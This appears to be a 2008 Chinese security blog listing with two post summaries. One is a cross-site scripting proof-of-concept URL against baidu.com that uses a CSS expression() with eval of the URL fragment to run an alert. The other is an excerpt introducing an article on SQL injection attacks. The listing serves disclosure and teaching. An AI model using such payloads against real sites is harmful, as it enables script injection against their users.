摘要: http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29 测试地址:运行 阅读全文
posted @ 2008-07-10 13:55 有安科技 阅读(248) 评论(0) 推荐(0) 编辑
摘要: Published: September 12, 2007 By Chema Alonso, Microsoft Security MVP See other Security MVP Article of the Month columns. Introduction This article describes how attackers take advantage of SQL I... 阅读全文
posted @ 2008-07-10 11:05 有安科技 阅读(967) 评论(0) 推荐(0) 编辑